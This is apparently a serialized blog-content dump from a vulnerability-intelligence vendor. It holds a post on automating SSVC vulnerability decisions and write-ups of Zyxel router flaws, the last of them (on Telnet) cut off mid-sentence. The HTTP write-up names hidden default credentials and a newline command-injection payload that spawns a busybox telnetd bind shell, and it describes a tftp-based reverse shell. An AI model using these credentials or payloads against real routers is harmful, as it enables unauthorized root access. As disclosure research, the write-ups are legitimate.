approach",[61,54462,202],{"id":201},[18,54464,45062],{},[18,54466,208],{},[18,54468,211,54469,45071],{},[47,54470,216],{"href":214,"rel":54471},[51],{"title":219,"searchDepth":220,"depth":220,"links":54473},[54474,54475,54476,54477,54478,54479,54480,54481,54482,54483],{"id":3520,"depth":220,"text":20},{"id":53963,"depth":220,"text":53964},{"id":54153,"depth":220,"text":54154},{"id":54201,"depth":220,"text":54202},{"id":54212,"depth":220,"text":54213},{"id":54327,"depth":220,"text":54328},{"id":54350,"depth":220,"text":54351},{"id":54380,"depth":220,"text":54381},{"id":54449,"depth":220,"text":54450},{"id":201,"depth":220,"text":202},"2025-02-24",{"slug":54486},"black-basta-chats","\u002Fblog\u002Fblack-basta-chats",{"title":53880,"description":53957},"blog\u002Fblack-basta-chats",[1280,242,1279],"gaVI_OUpWtT5kwK3mSJ-kF9M7oCWIFd-teGPIVuuOYE",{"id":54493,"title":54494,"articles":7,"authors":54495,"body":54497,"date":54944,"description":54945,"extension":234,"image":7,"link":7,"meta":54946,"navigation":237,"path":54948,"seo":54949,"series":7,"stem":54950,"subtype":7,"tags":54951,"__hash__":54952},"blog\u002Fblog\u002Fautomating-ssvc.md","Helping Enterprises & Governments Adopt Stakeholder Specific Vulnerability Categorization (SSVC)",[54496],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":54498,"toc":54937},[54499,54520,54523,54531,54535,54543,54547,54550,54585,54588,54614,54617,54643,54647,54650,54656,54659,54845,54849,54852,54855,54924,54926,54928,54930,54935],[18,54500,54501,54502,54507,54508,54513,54514,54519],{},"Stake-holder Specific Vulnerability Categorization (SSVC) is a methodology for prioritizing vulnerabilities that has created at ",[47,54503,54506],{"href":54504,"rel":54505},"https:\u002F\u002Finsights.sei.cmu.edu\u002Flibrary\u002Fprioritizing-vulnerability-response-a-stakeholder-specific-vulnerability-categorization\u002F",[51],"Carnagie Melon’s Software Engineering Institute"," largely been popularized by the ",[47,54509,54512],{"href":54510,"rel":54511},"https:\u002F\u002Fwww.cisa.gov\u002Fstakeholder-specific-vulnerability-categorization-ssvc",[51],"Cybersecurity & Infrastructure Security Agency"," encouraging federal agencies and enterprises to modernize their approach to vulnerability management. In 2024, CISA released ",[47,54515,54518],{"href":54516,"rel":54517},"https:\u002F\u002Fgithub.com\u002Fcisagov\u002Fvulnrichment",[51],"Vulnrichment"," which is an effort to provide the enrichment of SSVC decisions on CVE records which has set a foundational example on how to implement SSVC.",[18,54521,54522],{},"After hearing from federal agencies and enterprise organizations adopting SSVC across their vulnerability management program, we decided to set out to automate the creation of SSVC decisions across all CVEs to help make SSVC adoption a more realistic possibility.",[18,54524,54525,54526,54530],{},"Example CISA SSVC Decision Tree\n",[68,54527],{"alt":54528,"src":54529,"width":28205},"CISA SSVC","\u002Fblog\u002Fautomating-ssvc\u002Fcisa-ssvc.png","\nSource: CISA SSVC",[61,54532,54534],{"id":54533},"what-ssvc-decisions-has-vulncheck-automated","What SSVC decisions has VulnCheck automated?",[18,54536,54537,54538,59],{},"We’ve focused on automating the creation of SSVC decisions that can be generated through existing vulnerability and exploitation intelligence which include the Exploitation, Automatable and Total Impact decisions. We follow the same structure for the SSVC decisions as outlined in ",[47,54539,54542],{"href":54540,"rel":54541},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002Fcisa-ssvc-guide%20508c.pdf",[51],"CISA’s SSVC Guide",[61,54544,54546],{"id":54545},"what-criteria-does-vulncheck-use-for-generating-ssvc-decisions","What Criteria Does VulnCheck Use for Generating SSVC Decisions?",[18,54548,54549],{},"Exploitation Decision",[307,54551,54552,54560],{},[310,54553,54554],{},[313,54555,54556,54558],{},[316,54557,2750],{},[316,54559,42172],{},[336,54561,54562,54570,54577],{},[313,54563,54564,54567],{},[341,54565,54566],{},"None",[341,54568,54569],{},"There is no evidence of active exploitation and no public proof of concept (PoC) of how to exploit the vulnerability.",[313,54571,54572,54574],{},[341,54573,32535],{},[341,54575,54576],{},"A known POC exploit exists which is sourced from VulnCheck’s Exploit Intelligence. This includes Proof-of-Concept, Commercial and Weaponized exploits.",[313,54578,54579,54582],{},[341,54580,54581],{},"Active",[341,54583,54584],{},"Reliable evidence that cyber threat actors have used the exploit in the wild sourced from VulnCheck KEV which references credible sources.",[18,54586,54587],{},"Technical Impact Decision",[307,54589,54590,54598],{},[310,54591,54592],{},[313,54593,54594,54596],{},[316,54595,2750],{},[316,54597,42172],{},[336,54599,54600,54607],{},[313,54601,54602,54604],{},[341,54603,32603],{},[341,54605,54606],{},"CVSS metrics are used to identify when a decision node is Technical Impact:Partial. When CVSS metrics are not equal to ConfidentialityImpact: \"HIGH\", IntegrityImpact: \"HIGH\" the vulnerabilities is marked with Total.",[313,54608,54609,54611],{},[341,54610,3643],{},[341,54612,54613],{},"CVSS metrics are used to identify when a decision node is Technical Impact:Total. When CVSS metrics are equal to ConfidentialityImpact: \"HIGH\", IntegrityImpact: \"HIGH\" the vulnerabilities is marked with Total.",[18,54615,54616],{},"Automatable Decision",[307,54618,54619,54627],{},[310,54620,54621],{},[313,54622,54623,54625],{},[316,54624,2750],{},[316,54626,42172],{},[336,54628,54629,54636],{},[313,54630,54631,54633],{},[341,54632,383],{},[341,54634,54635],{},"CVSS metrics are used to identify when a decision node is automatable. The CVE is marked as automatable when the vulnerability is not a memory corruption vulnerability and the CVSS metrics are equal to AttackVector: \"NETWORK\", PrivilegesRequired: \"NONE\", UserInteraction: \"NONE\", AttackComplexity: \"LOW\".",[313,54637,54638,54640],{},[341,54639,359],{},[341,54641,54642],{},"Vulnerabilities without the conditions listed for automatable = Yes are marked as non-automatable.",[61,54644,54646],{"id":54645},"how-can-i-compare-the-difference-between-cisa-vulnrichment-ssvc-decisions-and-vulncheck","How can I compare the difference between CISA Vulnrichment SSVC decisions and VulnCheck",[18,54648,54649],{},"We’ve included CISA Vulnrichment alongside VulnCheck SSVC so you can compare between VulnCheck and CISA. Notable differences include a significant increase in CVE coverage, more exploitation evidence and more timely SSVC node generation.",[18,54651,54652],{},[68,54653],{"alt":54654,"src":54655,"width":28205},"SSVC Example","\u002Fblog\u002Fautomating-ssvc\u002Fssvc-example.png",[18,54657,54658],{},"VulnCheck-NVD2 API Response Example",[1354,54660,54662],{"className":22307,"code":54661,"language":22309,"meta":219,"style":219},"\"ssvc\": [\n {\n \"source\": \"CISA-ADP\",\n \"exploitation\": \"POC\",\n \"automatable\": \"NO\",\n \"technicalImpact\": \"TOTAL\"\n },\n {\n \"source\": \"VulnCheck\",\n \"exploitation\": \"ACTIVE\",\n \"automatable\": \"NO\",\n \"technicalImpact\": \"TOTAL\"\n }\n],\n",[886,54663,54664,54677,54681,54699,54718,54738,54756,54760,54764,54782,54801,54819,54835,54839],{"__ignoreMap":219},[1373,54665,54666,54668,54671,54673,54675],{"class":1375,"line":1376},[1373,54667,183],{"class":1387},[1373,54669,54670],{"class":1391},"ssvc",[1373,54672,183],{"class":1387},[1373,54674,20051],{"class":4640},[1373,54676,9050],{"class":1383},[1373,54678,54679],{"class":1375,"line":220},[1373,54680,26177],{"class":1383},[1373,54682,54683,54685,54687,54689,54691,54693,54695,54697],{"class":1375,"line":1266},[1373,54684,19050],{"class":9152},[1373,54686,43556],{"class":9155},[1373,54688,183],{"class":9152},[1373,54690,4606],{"class":1383},[1373,54692,4883],{"class":9173},[1373,54694,21877],{"class":9176},[1373,54696,183],{"class":9173},[1373,54698,9062],{"class":1383},[1373,54700,54701,54703,54705,54707,54709,54711,54714,54716],{"class":1375,"line":1852},[1373,54702,19050],{"class":9152},[1373,54704,31287],{"class":9155},[1373,54706,183],{"class":9152},[1373,54708,4606],{"class":1383},[1373,54710,4883],{"class":9173},[1373,54712,54713],{"class":9176},"POC",[1373,54715,183],{"class":9173},[1373,54717,9062],{"class":1383},[1373,54719,54720,54722,54725,54727,54729,54731,54734,54736],{"class":1375,"line":4692},[1373,54721,19050],{"class":9152},[1373,54723,54724],{"class":9155},"automatable",[1373,54726,183],{"class":9152},[1373,54728,4606],{"class":1383},[1373,54730,4883],{"class":9173},[1373,54732,54733],{"class":9176},"NO",[1373,54735,183],{"class":9173},[1373,54737,9062],{"class":1383},[1373,54739,54740,54742,54745,54747,54749,54751,54754],{"class":1375,"line":4724},[1373,54741,19050],{"class":9152},[1373,54743,54744],{"class":9155},"technicalImpact",[1373,54746,183],{"class":9152},[1373,54748,4606],{"class":1383},[1373,54750,4883],{"class":9173},[1373,54752,54753],{"class":9176},"TOTAL",[1373,54755,19057],{"class":9173},[1373,54757,54758],{"class":1375,"line":4756},[1373,54759,23985],{"class":1383},[1373,54761,54762],{"class":1375,"line":4768},[1373,54763,26177],{"class":1383},[1373,54765,54766,54768,54770,54772,54774,54776,54778,54780],{"class":1375,"line":4792},[1373,54767,19050],{"class":9152},[1373,54769,43556],{"class":9155},[1373,54771,183],{"class":9152},[1373,54773,4606],{"class":1383},[1373,54775,4883],{"class":9173},[1373,54777,2709],{"class":9176},[1373,54779,183],{"class":9173},[1373,54781,9062],{"class":1383},[1373,54783,54784,54786,54788,54790,54792,54794,54797,54799],{"class":1375,"line":4798},[1373,54785,19050],{"class":9152},[1373,54787,31287],{"class":9155},[1373,54789,183],{"class":9152},[1373,54791,4606],{"class":1383},[1373,54793,4883],{"class":9173},[1373,54795,54796],{"class":9176},"ACTIVE",[1373,54798,183],{"class":9173},[1373,54800,9062],{"class":1383},[1373,54802,54803,54805,54807,54809,54811,54813,54815,54817],{"class":1375,"line":4806},[1373,54804,19050],{"class":9152},[1373,54806,54724],{"class":9155},[1373,54808,183],{"class":9152},[1373,54810,4606],{"class":1383},[1373,54812,4883],{"class":9173},[1373,54814,54733],{"class":9176},[1373,54816,183],{"class":9173},[1373,54818,9062],{"class":1383},[1373,54820,54821,54823,54825,54827,54829,54831,54833],{"class":1375,"line":4817},[1373,54822,19050],{"class":9152},[1373,54824,54744],{"class":9155},[1373,54826,183],{"class":9152},[1373,54828,4606],{"class":1383},[1373,54830,4883],{"class":9173},[1373,54832,54753],{"class":9176},[1373,54834,19057],{"class":9173},[1373,54836,54837],{"class":1375,"line":4825},[1373,54838,27147],{"class":1383},[1373,54840,54841,54843],{"class":1375,"line":4835},[1373,54842,15050],{"class":1383},[1373,54844,9062],{"class":4640},[61,54846,54848],{"id":54847},"how-does-ssvc-coverage-compare-between-vulncheck-and-cisa-vulnrichment","How does SSVC Coverage Compare between VulnCheck and CISA Vulnrichment?",[18,54850,54851],{},"VulnCheck currently has SSVC coverage for 244,866 CVE's while CISA Vulnrichment has SSVC coverage for only 64,142 CVE's.",[18,54853,54854],{},"We’ve calculated a CISA \u002F VulnCheck match rate for each decision node that is calculated using the % match for VulnCheck of CISA Vulnrichment. It's worth mentioning that when we did a manual audit of mismatched decisions we often found inconsistencies in the decision generated by CISA that we believe would increase our match rates if these decisions were correct. This is common for manually generated vulnerability data that often lacks data validation.",[307,54856,54857,54867],{},[310,54858,54859],{},[313,54860,54861,54864],{},[316,54862,54863],{},"CISA SSVC Decision",[316,54865,54866],{},"VulnCheck SSVC Decision Match Rate",[336,54868,54869,54876,54884,54892,54900,54908,54916],{},[313,54870,54871,54874],{},[341,54872,54873],{},"exploitation:active",[341,54875,10862],{},[313,54877,54878,54881],{},[341,54879,54880],{},"exploitation:poc",[341,54882,54883],{},"86.7%",[313,54885,54886,54889],{},[341,54887,54888],{},"exploitation:none",[341,54890,54891],{},"90.6%",[313,54893,54894,54897],{},[341,54895,54896],{},"automatable:yes",[341,54898,54899],{},"88.9%",[313,54901,54902,54905],{},[341,54903,54904],{},"automatable:no",[341,54906,54907],{},"92.3%",[313,54909,54910,54913],{},[341,54911,54912],{},"technicalimpact:total",[341,54914,54915],{},"95.2%",[313,54917,54918,54921],{},[341,54919,54920],{},"technicalimpact:partial",[341,54922,54923],{},"85.6%",[61,54925,202],{"id":201},[18,54927,45062],{},[18,54929,208],{},[18,54931,211,54932,45071],{},[47,54933,216],{"href":214,"rel":54934},[51],[2901,54936,22694],{},{"title":219,"searchDepth":220,"depth":220,"links":54938},[54939,54940,54941,54942,54943],{"id":54533,"depth":220,"text":54534},{"id":54545,"depth":220,"text":54546},{"id":54645,"depth":220,"text":54646},{"id":54847,"depth":220,"text":54848},{"id":201,"depth":220,"text":202},"2025-02-13","VulnCheck now provides automated SSVC decisions for federal and enterprise agencies.",{"slug":54947},"automating-ssvc","\u002Fblog\u002Fautomating-ssvc",{"title":54494,"description":54945},"blog\u002Fautomating-ssvc",[1280,242,1279],"QV7gc_QqTfs0CA1IHzPAv56kA9kN-e5G0e48qr_bbfM",{"id":54954,"title":54955,"articles":7,"authors":54956,"body":54958,"date":55249,"description":55250,"extension":234,"image":7,"link":7,"meta":55251,"navigation":237,"path":55253,"seo":55254,"series":7,"stem":55255,"subtype":7,"tags":55256,"__hash__":55257},"blog\u002Fblog\u002Fzyxel-http-vuln.md","Zyxel HTTP Vulnerability",[54957],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":54959,"toc":55244},[54960,54962,54980,55018,55044,55047,55051,55066,55090,55096,55120,55126,55139,55145,55148,55152,55168,55174,55177,55181,55195,55202,55208,55211,55213,55216,55218,55233],[1920,54961,11648],{"id":11647},[18,54963,54964,54965,54970,54971,54975,54976,54979],{},"VulnCheck independently discovered vulnerabilities affecting Zyxel Customer Premises Equipment (CPE) after running into the hardware in the real world. Earlier this week, ",[47,54966,54969],{"href":54967,"rel":54968},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fzyxel-telnet-vulns",[51],"we detailed Telnet vulnerabilities"," that our colleagues at ",[47,54972,11029],{"href":54973,"rel":54974},"https:\u002F\u002Fwww.greynoise.io\u002Fblog\u002Factive-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891",[51]," observed being actively exploited. This follow-up blog examines a separate issue, a (sort of) authenticated vulnerability in the web interface that allows code execution as the root user. We believe, but have not received confirmation from the vendor, that ",[1131,54977,54978],{},"at least"," the following Zyxel CPE routers are affected:",[22,54981,54982,54985,54988,54991,54994,54997,55000,55003,55006,55009,55012,55015],{},[25,54983,54984],{},"VMG1312-B10A",[25,54986,54987],{},"VMG1312-B10B",[25,54989,54990],{},"VMG1312-B10E",[25,54992,54993],{},"VMG3312-B10A",[25,54995,54996],{},"VMG3313-B10A",[25,54998,54999],{},"VMG3926-B10B",[25,55001,55002],{},"VMG4325-B10A",[25,55004,55005],{},"VMG4380-B10A",[25,55007,55008],{},"VMG8324-B10A",[25,55010,55011],{},"VMG8924-B10A",[25,55013,55014],{},"SBG3300",[25,55016,55017],{},"SBG3500",[18,55019,55020,55021,55025,55026,55031,55032,55037,55038,55043],{},"As noted in our previous blog, these older routers remain accessible on the internet. Search engines vary in their estimates of exposure. ",[47,55022,41731],{"href":55023,"rel":55024},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.html_hash%3A1512052042+http.headers_hash%3A-2068755711",[51]," flags ~3,500 devices with an exposed administrative HTTP interface, ",[47,55027,55030],{"href":55028,"rel":55029},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.http.response.html_title%3A%22VMG1312-B10A%22+or+services.http.response.html_title%3A%22VMG1312-B10B%22+or+services.http.response.html_title%3A%22VMG1312-B10E%22+or+services.http.response.html_title%3A%22VMG1312-B10B%22+or+services.http.response.html_title%3A%22VMG3312-B10A%22+or+services.http.response.html_title%3A%22VMG3313-B10A%22+or+services.http.response.html_title%3A%22VMG3926-B10B%22+or+services.http.response.html_title%3A%22VMG4325-B10A%22+or+services.http.response.html_title%3A%22VMG4380-B10A%22+or+services.http.response.html_title%3A%22VMG8324-B10A%22+or+services.http.response.html_title%3A%22VMG8924-B10A%22+or+services.http.response.html_title%3A%22SBG3300%22+or+services.http.response.html_title%3A%22SBG3500%22",[51],"Censys"," ~1,250, ",[47,55033,55036],{"href":55034,"rel":55035},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=KCJWTUcxMzEyLUIxMEEiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUcxMzEyLUIxMEUiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUczMzEyLUIxMEEiIHx8ICJWTUczMzEzLUIxMEEiIHx8ICJWTUczOTI2LUIxMEIiIHx8ICJWTUc0MzI1LUIxMEEiIHx8ICJWTUc0MzgwLUIxMEEiIHx8ICJWTUc4MzI0LUIxMEEiIHx8ICJWTUc4OTI0LUIxMEEiIHx8ICJTQkczMzAwIiB8fCAiU0JHMzUwMCIpICYmIHNlcnZlcj09Im1pY3JvX2h0dHBkIg%3D%3D",[51],"FOFA"," ~20,000, and ",[47,55039,55042],{"href":55040,"rel":55041},"https:\u002F\u002Fwww.zoomeye.ai\u002FsearchResult?q=KHRpdGxlPSJWTUcxMzEyLUIxMEEiIHx8IHRpdGxlPSJWTUcxMzEyLUIxMEIiIHx8IHRpdGxlPSJWTUcxMzEyLUIxMEUiIHx8IHRpdGxlPSJWTUcxMzEyLUIxMEIiIHx8IHRpdGxlPSJWTUczMzEyLUIxMEEiIHx8IHRpdGxlPSJWTUczMzEzLUIxMEEiIHx8IHRpdGxlPSJWTUczOTI2LUIxMEIiIHx8IHRpdGxlPSJWTUc0MzI1LUIxMEEiIHx8IHRpdGxlPSJWTUc0MzgwLUIxMEEiIHx8IHRpdGxlPSJWTUc4MzI0LUIxMEEiIHx8IHRpdGxlPSJWTUc4OTI0LUIxMEEiIHx8IHRpdGxlPSJTQkczMzAwIiB8fCB0aXRsZT0iU0JHMzUwMCIpICYmIGh0dHAuaGVhZGVyLnNlcnZlcj0ibWljcm9faHR0cGQi",[51],"ZoomEye"," ~ 1,500. Each search engine finds devices in multiple regions, including the United States, Turkey, Philippines, South Africa, and France.",[18,55045,55046],{},"VulnCheck does not have access to all affected models. For the remainder of this blog, all images and exploitation details will be based on our reference device, the VMG4325-B10A, running firmware version 1.00(AAFR.4)C0_20170615.",[1920,55048,55050],{"id":55049},"cve-2024-40890-authenticated-http-vulnerability","CVE-2024-40890: Authenticated HTTP Vulnerability",[18,55052,55053,55054,55057,55058,55061,55062,55065],{},"The administrative HTTP interface is vulnerable to an authenticated command injection via ",[886,55055,55056],{},"\u002Fpages\u002FtabFW\u002Fdisagnostic-general.cgi"," (sic). Notably, on our test device, the hidden credentials (",[886,55059,55060],{},"supervisor:zyad1234","), previously discussed in our last blog, work on the HTTP interface, as does the provisioned ",[886,55063,55064],{},"zyuser:1234"," account. The presence of a working hidden and\u002For an undocumented default account effectively makes this vulnerability exploitable without authentication.",[18,55067,2245,55068,55071,55072,55075,55076,55079,55080,55083,55084,55087,55088,31686],{},[886,55069,55070],{},"httpd"," binary processes ",[886,55073,55074],{},".cgi"," requests through the ",[886,55077,55078],{},"do_cgi"," function. Specifically, handling for ",[886,55081,55082],{},"disagnostic-general.cgi"," appears as follows (note that the firmware manipulates file extensions during processing, which is why ",[886,55085,55086],{},".html"," appears instead of ",[886,55089,55074],{},[18,55091,55092],{},[68,55093],{":width":10862,"alt":55094,"src":55095},"Decompiled view of disagnostic-general.cgi handling","\u002Fblog\u002Fzyxel-http-vuln\u002Fdisagnostic-handling.png",[18,55097,55098,55101,55102,55105,55106,55108,55109,55112,55113,55116,55117,4606],{},[886,55099,55100],{},"local_1028"," represents the requested CGI script , while ",[886,55103,55104],{},"uVar8"," maps to an HTTP parameter, diagAddr, used by ",[886,55107,55082],{}," . Above, we can see that ",[886,55110,55111],{},"diagAddr"," is passed into a function called ",[886,55114,55115],{},"cmsUtl_isUnsafeString",". The function is reasonably effective, blocking common shell metacharacters and more: ",[886,55118,55119],{},"”\u003C>%\\^`[]\\+$=#&:;(){}|\u002F",[18,55121,55122],{},[68,55123],{":width":10862,"alt":55124,"src":55125},"Decompiled view of unsafe string","\u002Fblog\u002Fzyxel-http-vuln\u002Funsafestring.png",[18,55127,55128,55129,55131,55132,55135,55136,59],{},"However, the filter fails to block the newline character, which proves fatal. The attacker-controlled ",[886,55130,55111],{},"parameter (new line and all) is passed to ",[886,55133,55134],{},"cgiSetDiagnostic"," which eventually triggers a fork using ",[886,55137,55138],{},"\u002Fbin\u002Fsh -c {command} {diagAddr}",[18,55140,55141],{},[68,55142],{":width":10862,"alt":55143,"src":55144},"Decompiled view of set diagnostic","\u002Fblog\u002Fzyxel-http-vuln\u002Fsetdiagnostic.png",[18,55146,55147],{},"Using just the newline character, we can execute arbitrary commands and, as we will see, spawn shells.",[61,55149,55151],{"id":55150},"bind-shell","Bind Shell",[18,55153,55154,55155,55158,55159,55162,55163,22771,55166,59],{},"Establishing a bind shell is relatively simple. TThe attacker needs to complete two setup steps: authenticate to obtain a ",[886,55156,55157],{},"SESSION"," cookie, and retrieve a CSRF token from ",[886,55160,55161],{},"\u002Fpages\u002Fmaintenance\u002Fdisagnostic\u002FpingTest.html",". From there, executing a bindshell is as straightforward as appending ",[886,55164,55165],{},"\\nbusybox+telnetd+-l+sh+-p+1270",[886,55167,55111],{},[18,55169,55170],{},[68,55171],{":width":10862,"alt":55172,"src":55173},"Exploitation for bindshell","\u002Fblog\u002Fzyxel-http-vuln\u002Fbindshell.png",[18,55175,55176],{},"With a bind shell established, the next step is exploring reverse shell options. Unlike a bind shell, this presents additional challenges due to input filtering.",[61,55178,55180],{"id":55179},"reverse-shell","Reverse Shell",[18,55182,55183,55184,55186,55187,982,55189,55191,55192,55194],{},"Establishing a reverse shell is a bit more complicated due to ",[886,55185,55115],{},". The usual redirect-based reverse shells using telnet, nc, or openssl are blocked by metacharacter filtering. Additionally, the function restricts both ",[886,55188,4606],{},[886,55190,2180],{},", preventing the use of ",[886,55193,1553],{}," (busybox variant) despite it being available on the system.",[18,55196,55197,55198,55201],{},"The solution we landed on was using the tftp binary (busybox variant) to fetch and execute a compiled payload. Below, you can see that it plays out fairly simply: we download a binary as ",[886,55199,55200],{},"\u002Fhom\u002Fbin\u002Fl"," and execute it.",[18,55203,55204],{},[68,55205],{":width":10862,"alt":55206,"src":55207},"Exploitation for reverse shell","\u002Fblog\u002Fzyxel-http-vuln\u002Freverseshell.png",[18,55209,55210],{},"By combining weak input filtering, poor credential practices, and an exposed administrative interface, this vulnerability provides attackers with a straightforward path to remote code execution.",[1920,55212,1903],{"id":1902},[18,55214,55215],{},"The device’s default accounts and command injection vulnerabilities present a serious security risk. While these routers are aging and officially unsupported, thousands remain exposed online. Unfortunately, unsupported does not mean unexploited. This research underscores the lasting risks posed by insecure, internet-facing infrastructure that has been abandoned by the vendor.",[61,55217,202],{"id":201},[18,55219,53821,55220,1246,55223,1246,55226,1255,55230],{},[47,55221,40447],{"href":53829,"rel":55222},[51],[47,55224,36637],{"href":53833,"rel":55225},[51],[47,55227,55229],{"href":53837,"rel":55228},[51],"Fileless Remote Code Execution on Juniper Firewalls\n",[47,55231,22211],{"href":53842,"rel":55232},[51],[18,55234,53846,55235,53850,55238,982,55241,1260],{},[47,55236,1233],{"href":2871,"rel":55237},[51],[47,55239,1245],{"href":45535,"rel":55240},[51],[47,55242,216],{"href":214,"rel":55243},[51],{"title":219,"searchDepth":220,"depth":220,"links":55245},[55246,55247,55248],{"id":55150,"depth":220,"text":55151},{"id":55179,"depth":220,"text":55180},{"id":201,"depth":220,"text":202},"2025-02-07","As a follow-up to our previous Zyxel Telnet Vulnerabilities blog, VulnCheck examines CVE-2024-40890, a recently disclosed vulnerability in the HTTP interface of many end-of-life Zyxel CPE routers.",{"slug":55252},"zyxel-http-vuln","\u002Fblog\u002Fzyxel-http-vuln",{"title":54955,"description":55250},"blog\u002Fzyxel-http-vuln",[242,1281,1279],"enw6Anxxi92KhYAVNU8ilT7ZSuWs44CJ6ptI1DeEAug",{"id":55259,"title":55260,"articles":55261,"authors":55266,"body":55268,"date":57665,"description":57666,"extension":234,"image":7,"link":7,"meta":57667,"navigation":237,"path":57669,"seo":57670,"series":7,"stem":57671,"subtype":7,"tags":57672,"__hash__":57673},"blog\u002Fblog\u002Fzyxel-telnet-vulns.md","Zyxel Telnet Vulnerabilities",[55262],{"title":55263,"source":10841,"link":55264,"date":55265},"Critical Zyxel vulnerability under active exploitation after long period of quiet","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fvulnerability-zyxel-exploitation\u002F750922\u002F","2025-06-17",[55267],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":55269,"toc":57662},[55270,55272,55288,55314,55336,55342,55345,55351,55355,55372,55378,55391,55397,55422,55428,55437,55457,55471,56299,56307,56311,56324,56829,56832,56841,56861,56876,56882,56890,56909,56917,57040,57048,57053,57064,57067,57079,57088,57553,57557,57560,57627,57629,57632,57634,57648,57659],[1920,55271,11648],{"id":11647},[18,55273,55274,55275,55279,55280,55285,55286,54979],{},"VulnCheck independently discovered vulnerabilities affecting Zyxel Customer Premises Equipment (CPE) after running into the hardware in the real world. The combination of the vulnerabilities allows for unauthenticated code execution via Telnet. A week ago, our friends at GreyNoise ",[47,55276,55278],{"href":54973,"rel":55277},[51],"blogged"," about attackers actively using these vulnerabilities against their honeypot network, and the associated ",[47,55281,55284],{"href":55282,"rel":55283},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fzyxel-cpe-cve-2024-40891-command-injection-attempt?days=10",[51],"tag"," continues to flag ongoing activity. We believe, but have not received confirmation from the vendor, that ",[1131,55287,54978],{},[22,55289,55290,55292,55294,55296,55298,55300,55302,55304,55306,55308,55310,55312],{},[25,55291,54984],{},[25,55293,54987],{},[25,55295,54990],{},[25,55297,54993],{},[25,55299,54996],{},[25,55301,54999],{},[25,55303,55002],{},[25,55305,55005],{},[25,55307,55008],{},[25,55309,55011],{},[25,55311,55014],{},[25,55313,55017],{},[18,55315,55316,55317,55322,55323,982,55327,55331,55332,59],{},"We’ve been informed that these affected routers are end-of-life, though not listed on ",[47,55318,55321],{"href":55319,"rel":55320},"https:\u002F\u002Fwebservice.zyxel.com\u002Fend-of-life",[51],"Zyxel’s EOL"," page. Despite this, both ",[47,55324,55036],{"href":55325,"rel":55326},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=KCJWTUcxMzEyLUIxMEEiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUcxMzEyLUIxMEUiIHx8ICJWTUcxMzEyLUIxMEIiIHx8ICJWTUczMzEyLUIxMEEiIHx8ICJWTUczMzEzLUIxMEEiIHx8ICJWTUczOTI2LUIxMEIiIHx8ICJWTUc0MzI1LUIxMEEiIHx8ICJWTUc0MzgwLUIxMEEiIHx8ICJWTUc4MzI0LUIxMEEiIHx8ICJWTUc4OTI0LUIxMEEiIHx8ICJTQkczMzAwIiB8fCAiU0JHMzUwMCIpICYmIHByb3RvY29sPSJ0ZWxuZXQi",[51],[47,55328,55030],{"href":55329,"rel":55330},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=services.telnet.banner%3A%22VMG1312-B10A%22+or+services.telnet.banner%3A%22VMG1312-B10B%22+or+services.telnet.banner%3A%22VMG1312-B10E%22+or+services.telnet.banner%3A%22VMG1312-B10B%22+or+services.telnet.banner%3A%22VMG3312-B10A%22+or+services.telnet.banner%3A%22VMG3313-B10A%22+or+services.telnet.banner%3A%22VMG3926-B10B%22+or+services.telnet.banner%3A%22VMG4325-B10A%22+or+services.telnet.banner%3A%22VMG4380-B10A%22+or+services.telnet.banner%3A%22VMG8324-B10A%22+or+services.telnet.banner%3A%22VMG8924-B10A%22+or+services.telnet.banner%3A%22SBG3300%22+or+services.telnet.banner%3A%22SBG3500%22",[51]," identify approximately 1,500 affected systems with internet-facing Telnet interfaces. Additionally, some of these models are still available for purchase through ",[47,55333,33119],{"href":55334,"rel":55335},"https:\u002F\u002Fwww.amazon.com\u002Fstores\u002Fpage\u002FF26A3E2F-46D3-46C9-BCDA-3D4EA62563F6\u002Fsearch?terms=VMG4325-B10A",[51],[18,55337,55338],{},[68,55339],{":width":10862,"alt":55340,"src":55341},"EOL Router in Zyxel Store","\u002Fblog\u002Fzyxel-telnet-vulns\u002Famazon-store.png",[18,55343,55344],{},"While these systems are older and seemingly long out of support, they remain highly relevant due to their continued use worldwide and the sustained interest from attackers. The fact that attackers are still actively exploiting these routers underscores the need for attention, as understanding real-world attacks is critical to effective security research.",[18,55346,55347,55348,59],{},"VulnCheck does not have access to all affected models. For the remainder of this blog, all images and exploitation details will be based on our reference device, the VMG4325-B10A, running firmware version ",[886,55349,55350],{},"1.00(AAFR.4)C0_20170615",[1920,55352,55354],{"id":55353},"cve-2024-40891-telnet-authenticated-command-inject","CVE-2024-40891: Telnet Authenticated Command Inject",[18,55356,55357,55358,55363,55364,55367,55368,55371],{},"The device’s Telnet command processing is vulnerable to an authenticated command injection when the attacker has access with any user account. This vulnerability has been assigned ",[47,55359,55362],{"href":55360,"rel":55361},"https:\u002F\u002Fvulncheck.com\u002Fcve\u002FCVE-2024-40891",[51],"CVE-2024-40891",". Command processing is handled by the ",[886,55365,55366],{},"libcms_cli.so"," library, with most of the work occurring in the ",[886,55369,55370],{},"cli_processCliCmd"," function. This function is responsible for looking up commands and their associated functions within a large command table.",[18,55373,55374],{},[68,55375],{":width":10862,"alt":55376,"src":55377},"Decompiled CLI logic","\u002Fblog\u002Fzyxel-telnet-vulns\u002Fprocessclicmd.png",[18,55379,55380,55381,55383,55384,55387,55388,59],{},"However, some commands do not have built-in functions. For example, the following screenshot shows that the ",[886,55382,22966],{}," command is handled by ",[886,55385,55386],{},"FUN_0001b5a8"," but there is no function associated with 